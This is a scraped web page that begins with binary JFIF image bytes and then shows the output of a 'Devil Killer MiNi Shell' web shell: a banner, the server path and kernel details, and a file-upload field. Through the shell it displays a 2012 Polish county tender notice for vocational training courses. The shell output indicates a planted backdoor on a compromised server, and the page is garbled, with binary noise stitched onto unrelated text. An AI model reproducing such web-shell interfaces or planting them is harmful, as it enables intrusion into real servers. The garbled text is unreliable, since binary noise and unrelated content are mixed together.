JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121023/225313-N-2012.html

<p class="kh_header"><b>Pszczyna: Przeprowadzenie i zorganizowanie kursów praktycznej nauki zawodu
dla uczniów szkół ponadgimnazjalnych, realizowanych w ramach projektu  Mam zawód - mam pracę w regionie.</b><br>
<b>Numer ogłoszenia: 225313 - 2012; data zamieszczenia: 23.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie i zorganizowanie kursów praktycznej nauki zawodu
dla uczniów szkół ponadgimnazjalnych, realizowanych w ramach projektu  Mam zawód - mam pracę w regionie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przeprowadzenie i zorganizowanie kursów praktycznej nauki zawodu dla uczniów szkół ponadgimnazjalnych, realizowanych w ramach projektu  Mam zawód - mam pracę w regionie, obejmujących następujące kursy:
a.	kierowcy operatora wózków jezdniowych podnośnikowych
b.	operatora agregatów tynkarskich w zakresie III
c.	kurs przygotowawczy do egzaminu kwalifikacyjnego uprawniającego do eksploatacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie przekraczającym 1kV
d.	spawania MAG 135
dla uczniów szkół ponadgimnazjalnych uczestników projektu systemowego pn. Mam zawód - mam pracę w regionie, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013.
Przedmiotowe kursy powinny obejmować wiedzę teoretyczną i praktyczną z zakresu danego kursu.
Ze względu na charakter usługi całość zamówienia podzielono na cztery odrębne części, dopuszczając możliwość ubiegania się o każdą z części zamówienia z osobna:

a.	CZĘŚĆ A - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU KIEROWCY OPERATORA WÓZKÓW JEZDNIOWYCH.
b.	CZĘŚĆ B - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU OPERATORA AGREGATÓW TYNKARSKICH W ZAKRESIE III.
c.	CZĘŚĆ C - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU PRZYGOTOWAWCZEGO DO EGZAMINU KWALIFIKACYJNEGO UPRAWNIAJĄCEGO DO EKSPLOATACJI URZĄDZEŃ, INSTALACJI I SIECI ELEKTROENERGETYCZNYCH O NAPIĘCIU NIE PRZEKRACZAJĄCYM 1 kV.
d.	 CZĘŚĆ D - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU SPAWANIA MAG 135.
Wartość zamówienia nie przekracza kwot określonych w przepisach wydanych na podstawie  art. 11 ust. 8 ustawy Prawo Zamówień Publicznych ustawy z dnia  29 stycznia 2004r. - Prawo Zamówień Publicznych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu  zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.53.12.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium (dotyczy  części  D zamówienia): tj. części zamówienia dotyczącej
KURSU SPAWANIA MAG 135.  Zamawiający wymaga wniesienia wadium w wysokości: 1500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100) w terminie do dnia 31.10.2012 do godz. 11.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia  (art. 22 ust.1 pkt 3 ustawy PZP)   Zamawiający wymaga złożenia następujących dokumentów:

Dla CZĘŚĆ A - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA  KURSU KIEROWCY OPERATORA WÓZKÓW JEZDNIOWYCH 

a.	Wykazu  wyposażenia (wózków widłowych) tj. dostępnego Wykonawcy potencjału technicznego w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. Warunek minimalny Zamawiającego:  2 wózki widłowe niezbędne do przeprowadzenia zajęć praktycznych, zgodnie z wymogami Zamawiającego.
b.	Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa wyżej polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wymagane jest załączenie do oferty odpowiednio  załącznika 2;2a do SIWZ Oświadczenie innego podmiotu.

Dla CZĘŚCI B, C, D zamówienia Zamawiający nie wymaga złożenia w ofercie dokumentów potwierdzających spełnienie warunków dotyczących dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, których przedłożenia w ofercie żąda Zamawiający: 
wypełniony Formularz ofertowy -  załącznik nr 1 do SIWZ.
Inne oświadczenia i dokumenty, które Zamawiający zaleca załączyć do oferty:
a.	Zaświadczenie o wpisie do ewidencji działalności gospodarczej - służy właściwej weryfikacji należytej reprezentacji podmiotu, przedłożenie dokumentu umożliwi Zamawiającemu dokonanie oceny czy osoba fizyczna, składająca oświadczenie woli w postaci oferty w postępowaniu o udzielenie zamówienia publicznego, prowadzi działalność gospodarczą zarejestrowaną  przez właściwy organ. Zamawiający dokonując oceny oferty musi mieć jednoznaczną informację o statusie cywilnoprawnym wykonawcy.
b.Dowód wpłaty  lub wniesienia wadium - dla części D.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umów/umowy w następujących okolicznościach:
a.	rezygnacji Zamawiającego z wykonania części usługi z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia wykonawcy,
b.	ustawowej zmiany przepisów podatkowych, , np. zmiany stawki podatku VAT
c.	działania siły wyższej, zdarzeń losowych niezależnych od stron umowy
d.	poprawy oczywistej omyłki.
e.	zmiany terminu realizacji zamówienia spowodowanej przerwami w realizacji usługi powstałymi z przyczyn nie leżących po stronie Wykonawcy;
f.	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
g.	zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych;
h.	zmiana lub wprowadzenie podwykonawcy, zmiana lub wprowadzenie osoby/ osób uczestniczących w wykonywaniu zamówienia pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
i.	zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy; 
j.	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
k.	konieczności wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki, 




l.	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie,Wydział Zamówień Publicznych pok. 5 Sekretariat lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Rozwój wykształcenia i kompetencji w regionach,  Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU KIEROWCY OPERATORA WÓZKÓW JEZDNIOWYCH PODNOŚNIKOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ A - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU KIEROWCY OPERATORA WÓZKÓW JEZDNIOWYCH PODNOŚNIKOWYCH

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu operatora wózków jezdniowych podnośnikowych, zgodnie z wymogami określonymi w przepisach: ustawy z dnia 21 grudnia 2000 roku o dozorze technicznym (Dz. U. z 2000 roku, Nr 122, poz. 1321 z późniejszymi zmianami), rozporządzenia Ministra Gospodarki z dnia 18 lipca 2001 roku w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. z 2001 roku, Nr 79, poz. 849 z późn. zm.), rozporządzenia Ministra Gospodarki z dnia 10 maja 2002r, w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. z 2002r., nr 70, poz. 650 z późn. zm.)
b.	Celem szkolenia jest zdobycie przez uczestników szkolenia teoretycznej wiedzy i praktycznych umiejętności w zakresie manewrowania i obsługi technicznej wózków jezdniowych podnośnikowych z wyłączeniem specjalizowanych oraz nabycie umiejętności z zakresu bezpiecznej wymiany butli gazowych w wózkach wyposażonych w te urządzenia.
c.	Przewiduje się, że maksymalna liczba uczestników wynosić będzie 35 osób, a kurs  odbywać się będzie w ramach dwóch grup.
Grupa I -  do 20 osób - termin rozpoczęcia od dnia podpisania umowy
Grupa II -  do 15 osób - termin rozpoczęcia od dnia 15 grudnia 2012
Termin zakończenia zamówienia - 28.02.2013r.
d.	Osoby zakwalifikowane do udziału w szkoleniu powinny zostać skierowane na badania celem stwierdzenia istnienia lub braku przeciwwskazań zdrowotnych do zawodu kierowcy operatora wózka jezdniowego. Wykonawca zobowiązany jest do poniesienia kosztów związanych z przeprowadzeniem badań lekarskich dla każdego uczestnika kursu. Badania winny być przeprowadzone przed rozpoczęciem zajęć teoretycznych.
e.	Zamawiający wymaga by zajęcia teoretyczne odbywały się na terenie warsztatów szkolnych  Powiatowego Zespołu Szkół nr 1 w Pszczynie, przy ul. Bogedaina 21, w dniach od poniedziałku do soboty. Zamawiający udostępni nieodpłatnie sale szkoleniowe na ten cel.
f.	Wykonawca zobowiązany jest zapewnić wyposażenie dydaktyczne, urządzenia niezbędne dla przeprowadzenia kursów oraz pozostałe wymagania zgodnie z warunkami wynikającymi z odrębnych przepisów.
g.	Wykonawca winien opracować harmonogram przeprowadzenia szkolenia w oparciu o ustaloną częstotliwość spotkań z określeniem czasu jego trwania z uwzględnieniem wszystkich godzin.
h.	Liczba zajęć teoretycznych nie może być mniejsza niż 38 godzin/na osobę, przy czym  godzina zajęć teoretycznych wynosić będzie 45 minut.
Liczba zajęć praktycznych nie może być mniejsza niż 10 godzin/na osobę, przy czym godzina zajęć praktycznych wynosić będzie  60 minut.
Zakres szkolenia winien obejmować następujące zagadnienia: 
1.	Typy stosowanych wózków jezdniowych,
2.	Budowa wózka jezdniowego,
3.	Czynności operatora przy obsłudze wózków przed podjęciem pracy i po zakończeniu pracy

4.	Czynności operatora w czasie pracy wózkami,
5.	Wiadomości z zakresu ładunkoznawstwa,
6.	Wiadomości z zakresu bhp,
7.	Praktyczna nauka jazdy i manewrowania osprzętem wózków,
8.	Szkolenie z zakresu bezpiecznej obsługi-wymiany butli gazowych,
9.	Wiadomości o Dozorze Technicznym.
i.	Wykonawca zobowiązany będzie uzgadniać terminy zajęć praktycznych każdorazowo z uczestnikiem kursu - w godzinach nie kolidujących z zajęciami szkolnymi.
j.	Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, EFS, POKL i nazwą projektu.
k.	Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania ponosi Zamawiający.
l.	Kurs winien zakończyć się egzaminem wewnętrznym, sprawdzającym zdobytą wiedzę teoretyczną i praktyczną. Po zdaniu egzaminu wewnętrznego  z wynikiem pozytywnym uczestnik otrzymuje   odpowiednie zaświadczenie/certyfikat.
Uczestnik po ukończeniu kursu może przystąpić do egzaminu przed komisją egzaminacyjną z Urzędu Dozoru Technicznego oraz ubiegać się o wydanie zaświadczenia kwalifikacyjnego UDT uprawniającego do obsługi wózka widłowego z uprawnieniami bezpiecznej obsługi-wymiany butli gazowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.53.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU OPERATORA AGREGATÓW TYNKARSKICH W ZAKRESIE III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ B - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU OPERATORA AGREGATÓW TYNKARSKICH W ZAKRESIE III.

Celem kursu jest przygotowanie uczestników do bezpiecznej obsługi agregatów tynkarskich, poprzez przekazanie fachowej wiedzy technicznej z następujących zakresów: 
1.	Budowa agregatów tynkarskich;
2.	Użytkowanie eksploatacyjne agregatów; 
3.	Prawidłowe korzystanie z dokumentacji techniczno - ruchowych,
4.	Instrukcje użytkowania i obsługi; 
5.	Bezpieczeństwo i higieny pracy podczas obsługi agregatów tynkarskich; 
6.	Technologia robót;
7.	Zajęcia praktyczne.
b.	Przewiduje się, że maksymalna liczba uczestników wynosić będzie 3 osoby i kurs  odbywać się będzie w ramach jednej grupy. Zakończenie zadania w terminie do 31 stycznia 2013.
c.	Liczba zajęć teoretycznych nie może być mniejsza niż 39 godzin/na osobę, przy czym  godzina zajęć teoretycznych wynosić będzie 45 minut.
Liczba zajęć praktycznych nie może być mniejsza niż 13 godzin/na osobę, przy czym godzina zajęć praktycznych wynosić będzie  60 minut
d.	Osoby zakwalifikowane do udziału w szkoleniu w pierwszej kolejności powinny zostać skierowane na badania celem stwierdzenia istnienia lub braku przeciwwskazań zdrowotnych do wykonywania zajęć operatora agregatów tynkarskich. Wykonawca zobowiązany jest do poniesienia kosztów związanych z przeprowadzeniem badań lekarskich dla każdego uczestnika kursu. Badania winny być przeprowadzone przed rozpoczęciem zajęć teoretycznych.


e.	Zamawiający udostępni nieodpłatnie sale szkoleniowe w placówkach oświatowych, których organem prowadzącym jest Powiat Pszczyński, dla potrzeb prowadzenia zajęć teoretycznych, w dniach od poniedziałku do soboty. 
f.	Wykonawca winien zapewnić wyposażenie dydaktyczne, urządzenia niezbędne dla przeprowadzenia kursu oraz pozostałe wymagania zgodnie z warunkami wynikającymi z odrębnych przepisów oraz winien zapewnić bazę do prowadzenia zajęć praktycznych zgodnie  z wymogami wynikającymi z odrębnych przepisów. Ponadto Wykonawca zapewnia odzież i osprzęt ochronny dla uczestników kursu.
g.	Wykonawca winien opracować harmonogram przeprowadzenia szkolenia w oparciu o ustaloną częstotliwość spotkań z określeniem czasu jego trwania z uwzględnieniem wszystkich godzin.
h.	Wykonawca zobowiązany będzie uzgadniać terminy zajęć praktycznych każdorazowo z uczestnikiem kursu - w godzinach nie kolidujących z zajęciami szkolnymi.
i.	Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania ponosi Zamawiający.
Kurs winien zakończyć się egzaminem sprawdzającym zdobytą wiedzę teoretyczną i praktyczną. Uczestnik kursu otrzymuje odpowiednie zaświadczenie lub certyfikat.
j.	Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, EFS, POKL i nazwą projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.12.00-7, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU PRZYGOTOWAWCZEGO DO EGZAMINU KWALIFIKACYJNEGO UPRAWNIAJĄCEGO DO EKSPLOATACJI URZĄDZEŃ, INSTALACJI I SIECI ELEKTROENERGETYCZNYCH O NAPIĘCIU NIE PRZEKRACZAJĄCYM 1 kV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ C - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU PRZYGOTOWAWCZEGO DO EGZAMINU KWALIFIKACYJNEGO UPRAWNIAJĄCEGO DO EKSPLOATACJI URZĄDZEŃ, INSTALACJI I SIECI ELEKTROENERGETYCZNYCH O NAPIĘCIU NIE PRZEKRACZAJĄCYM 1 kV.

